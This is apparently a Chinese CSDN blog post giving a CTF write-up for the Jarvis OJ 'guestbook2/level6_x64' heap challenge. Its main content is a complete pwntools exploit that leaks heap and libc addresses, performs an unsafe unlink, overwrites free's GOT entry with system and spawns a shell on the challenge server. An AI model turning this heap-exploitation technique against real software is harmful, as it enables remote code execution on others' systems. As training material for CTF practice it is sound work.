jarvis guestbook2 / level6_x64

最新推荐文章于 2022-03-13 11:03:24 发布
最新推荐文章于 2022-03-13 11:03:24 发布
阅读量849 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41617275/article/details/88419768
版权
pwn 同时被 2 个专栏收录
18 篇文章 1 订阅
订阅专栏
3 篇文章 0 订阅
订阅专栏

与level6思路相同,只是在x64运行。和level6_x64几乎一模一样。
遇到几个问题:
1.[DEBUG] Received 0x4e bytes: "*** Error in guestbook2: realloc(): invalid pointer: 0x0000000001dcb018 ***\n"
调试了半天发现是当新块的大小与原来不一致时都会调用realloc,所以要填充的时候要仔细。

2.原本想这样泄漏libc基地址,然后symbols[‘system’]加上基地址就是服务器system地址,但后来发现本地是libc-2.19,他给的是libc.so.6,在文件里的偏移貌似不一样,所有只能用atoi函数的相对偏移。

#p.recvuntil('22222222')
#q=p.recvuntil('\x0a')
#libc_addr=u64(q[:-1].ljust(8,'\x00'))-0x3c27b8
#print(hex(libc_addr+0x3c27b8))

脚本如下:

from pwn import *
context.log_level = 'debug'
local=1
if local==1:
	p=process('guestbook2')
else:
	p=remote('pwn.jarvisoj.com',9879)


e=ELF('guestbook2')
libc=ELF('libc.so.6')

def List():
	p.recvuntil('Your choice: ')
	p.sendline('1')


def new(cont):
	p.recvuntil('Your choice: ')
	p.sendline('2')
	p.recvuntil('Length of new post: ')
	p.sendline(str(len(cont)))
	p.recvuntil('Enter your post: ')
	p.sendline(cont)

def edit(num,cont):
	p.recvuntil('Your choice: ')
	p.sendline('3')
	p.recvuntil('Post number: ')
	p.sendline(str(num))
	p.recvuntil('Length of post: ')
	p.sendline(str(len(cont)))
	p.recvuntil('Enter your post: ')
	p.sendline(cont)

def delete(num):
	p.recvuntil('Your choice: ')
	p.sendline('4')
	p.recvuntil('Post number: ')
	p.sendline(str(num))

###############泄漏堆地址
new('a'*0x80)
new('b'*0x80)
new('c'*0x80)
new('d'*0x80)
delete(0)
delete(2)
new('11111111')
new('22222222')
List()
p.recvuntil('11111111')
s=p.recvuntil('\x0a')
chunk2=u64(s[:-1].ljust(8,'\x00'))
heap_addr=chunk2-0x1940
point_chunk0=heap_addr+0x30
print hex(heap_addr)

######################清理
delete(1)
delete(2)
delete(3)

######################构造,并unlink,使原本指向chunk0的指针指向堆头
payload = p64(0x90)+p64(0x80)+p64(point_chunk0-24)+p64(point_chunk0-16) 
payload +='a'*0x60
payload += p64(0x80)+p64(0x90)
payload +='c'*0x80+p64(0x90)+p64(0x121)

edit(0,payload)
delete(1)

######################修改堆头结构从而定义自己想要的堆,定义了3个堆,
######################第一个是为了修改free的got表,第二个是为了传入‘/bin/sh‘
######################第三个是为了得到服务器libc中函数地址。
free_got_addr=e.got['free']
print hex(free_got_addr)
payload2=p64(3)+p64(1)+p64(0x8)+p64(free_got_addr)+p64(1)+p64(0x8)+p64(chunk2)+p64(1)+p64(0x8)+p64(e.got['atoi'])
payload2+='\x00'*(0x120-80)
edit(0,payload2)

##################获得服务器上system地址
p.recvuntil('Your choice: Invalid!\n')
List()
p.recvuntil('2. ')
atoi_in_server=u64(p.recvuntil('\x0a')[:-1].ljust(8,'\x00'))
system_in_server=libc.symbols['system']+atoi_in_server-libc.symbols['atoi']
#gdb.attach(proc.pidof(p)[0])

###############此时free已变为system
payload3=p64(system_in_server)
edit(0,payload3)
edit(1,"/bin/sh\x00")
delete(1)

p.interactive()
发蝴蝶和大脑斧
关注
专栏目录
JARVIS项目源码分析 - awesome_chat.py代码分析2
sisiair的博客
04-13 235
2、调用 record_case 函数,将记录写入log文件,成功写入log_success.jsonl,失败写入log_fail.jsonl。1、调用 parse_task函数, 解析任务:使用ChatGPT分析用户的请求,了解他们的意图,并将其拆解成可能的可解决任务。5、调用 chitchat 函数,此函数,构建参数数据,调用send_request函数给openai接口发请求。1.任务规划:使用ChatGPT分析用户的请求,了解他们的意图,并将其拆解成可能的可解决任务。内容太多,未完待续......
guestbookv2.1
05-08
MyEclipse,Tomcat环境下,基于OSIV,DAO泛型,Hibernate的网络留言本项目
jarvisoj)(pwn)guestbook2/level6_x64
PLpa的博客
08-28 1121
guestbook2level6_x64真的是一摸一样的,两个题目除了提示文字不同,其他的漏洞根本一样,鉴于jarvisoj中的pwn服务器比pwn2服务器要稳定一点,所以这里就写guestbook2。 前言: 这里,我提供两种方法解题,一种是利用unlink的任意地址读写功能泄露libc基址,一种是用unsorted bin和use after free来泄露libc基址,两种方法都行。 漏洞...
JarvisOJ guestbooks2
snowleopard_bin的博客
09-25 820
在网上看到大佬的writeup,一开始懵逼了很久,有很多参数不知道是什么意思,大佬也懒得注释。经过摸爬滚打的调试,我在这给大佬的writeup写写注释,既便于自己以后回顾的时候能马上捡起来,也能帮助一些像我这样的菜鸡学习知识。 https://veritas501.space/2017/03/10/JarvisOJ_WP/  该exp的思路是: 1、free chunk3 和chunk1(注...
Jarvis OJ pwn guestbook2
qq_26317875的博客
11-15 791
Jarvis OJ pwn guestbook2   具体的wp网上有很多   放出一张图,解释了一些细节,可能有助于理解
jarvisoj_level6_x64
z1r0的博客
03-13 673
jarvisoj_level6_x64 查看保护 这一类保护的堆题基本上就是申请到堆控制的地址,改got表 进ida直接奔delete这里去了,一枚uaf 第二个漏洞在这里edit可以申请size 攻击思路:这一题可以看到堆的size和是否释放都放在了一个地方,看了一下保护就可以知道大概的思路了。申请到管理堆的地方,然后填充入got表输出libc,改got为system。 注意:这里申请的是unstroted bin大小的堆块!!! 1.首先肯定是先要泄露libc,这一题可以使用unlink来解决,一
BUUCTF----jarvisoj_level3_x64
qq_33010875的博客
09-26 482
环境:WSL2,ubuntu16.04,python2 checksec文件: 这道题level3的思路一样,只是32位的程序改成了64位。 也就是说,在利用write函数泄露出libc的基地址时,需要用到寄存器来穿参数,write有三个参数,所以需要rdi,rsi,rdx三个寄存器,通过命令: ROPgadget --binary level3_x64 |grep "pop" 结果: 从图中可以看到只找到了rdi和rsi寄存器,没有rdx寄存器 尝试gdb程序: 在read函数下断点,可以看到rd
BUUCTF:jarvisoj_level3_x64(write up)
qq_44768749的博客
08-24 943
BUUCTF:jarvisoj_level3_x640x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 64位程序,仅开启栈不可执行保护 0x02 运行 输入一个字符串 0x03 IDA 字符串可输入长度可造成栈溢出 0x04 思路 没有提供system函数和"/bin/sh"的地址 第一次栈溢出泄露read函数地址来得到libc版本,从而获取system函数和"/bin/sh"的地址,并且返回主函数 这里有个难点就是参数需要放到对应
(Jarvis Oj)(Pwn) level3_x64
Nothing
04-24 971
(Jarvis Oj)(Pwn) level3_x64 这题是level3的64位版本,思路和32位版本一致,不同之处就是函数的参数传递,利用寄存器,于是构造rop链。写得脚本如下: from pwn import * ...
Jarvislevel2_x64--64位简单栈溢出
qq_43613144的博客
07-26 428
ROPgadget 查找可存储寄存器的代码 ROPgadget --binary level_x64(名字) --only 'pop|ret' | grep 'eax' 查找字符串 ROPgadget --binary rop --string "/bin/sh" 查找有int 0x80的地址 ROPgadget --binary rop --only 'int' ...
jarvis2, 使用 Flask 和Mithril构建出色的仪表板.zip
09-18
jarvis2, 使用 Flask 和Mithril构建出色的仪表板 贾维斯 JARVIS是一个用来在 树莓派 上运行的仪表板框架。它使用服务器发送事件实时更新小部件,并且可以轻松扩展以满足你的需求。屏幕截图 依赖项JARVIS需要 python 2.7 或者 python 3.3
jarvis2:使用Flask和Mithril构建的超棒仪表板
02-05
贾维斯 JARVIS是一个仪表板框架,旨在在Raspberry Pi上运行。 它具有使用来实时更新小部件的功能,可以轻松扩展以满足您的需求。 屏幕截图 依存关系 JARVIS需要Python 3.6以上版本才能运行。 安装要求: pip install -r requirements.txt 为了进行开发,建议使用 。 组态 小部件的所有配置都在一个Python源文件中完成。 通过设置JARVIS_SETTINGS环境变量来指定配置。 提供了一个示例配置( jarvis/config.py.sample )。 该文件可用作您自己的配置的起点。 将jarvis/config.py.s
jarvisoj_level6_x64(buuctf)--unlink利用
weixin_45427676的博客
04-14 671
这道题利用了unlink,unlink的利用原理我已经讲过了,以这个题来实列操作一下,加深对unlink利用的认识 查看保护机制 程序分析 在IDA查看一下主函数 可以看到程序中有四个功能函数,该程序是一个记事本程序,功能上基本就是添加记录、打印列出所有记录、编辑记录、删除记录。简单分析一下各函数的作用。 1、sub_400a49:创建记录索引表,具体就是分配一个大堆,堆里面存了各条记录存储区...
jarvis level6_x64堆溢出unlink拾遗
weixin_30274627的博客
11-16 184
level6 32位的我没有调出来,貌似32位的堆结构和64位不太一样,嘤嘤嘤?,所以做了一下这个64位的,题目地址,level6_x64 首先看一下程序的结构体 struct list //0x1810 { int all=256; int now_sum; struct _note *note; } struct _note { ...
jarvis oj level6
发蝴蝶和大脑斧的博客
01-10 1198
原来的附件有点问题,重新发过了. 主要用了两个技术:1.溢出泄露libc地址,heap地址.2.unsafe_unlink,这个how2pwn上unsafe_unlink.c里写的很清楚. 首先看泄露libc地址 New("A"*0x80)#0 New("B"*0x80)#1 Delete(0) New("123") List() c=p.recvuntil('AAAA') leak_addr=u...
jarvisOJ)(pwn)level6_x86
PLpa的博客
08-05 452
Unlink!Unlink!Unlink! level6_x86作为一道堆溢出入门题,还是值得用来练练手,学习一下堆的基础的知识的。 参考文献: ctf-wiki:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/unlink-zh/ 大佬博客:https://blog.csdn.net/weixin_41617275/article...
jarvisoj pwn level6 writeup
charlie_heng的专栏
01-21 1748
考完试了,又开始做题 这题是一道很好的用来熟悉堆的题 首先先确定漏洞的地方是delete note 漏洞有两个 1. 没有校验对应的堆是否有free 2. delete完之后没有把指向堆的指针清除 所以可以利用double free,触发unlink,达到任意内存修改的目的 具体怎么利用在https://www.cnblogs.com/0xJDchen/p/6195919.html
服务器运行级别(runlevel
ZZMJ_F的博客
11-15 1648
从linux社区转的一篇关于服务器运行级别的文章:(总结:查看运行级别只需要一条命令runlevel) CentOS系统: [root@www.linuxidc.com ~]# runlevel N 3 RedHat系列有7个运行级别(runlevel) 运行级别0:系统停机状态,系统默认运行级别不能设为0,否则不能正常启动 运行级别1:单用户工作状态,ro
jarvisoj_level2
最新发布
08-13
- *1* *3* [jarvisoj_level2_x64](https://blog.csdn.net/zip471642048/article/details/125448386)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值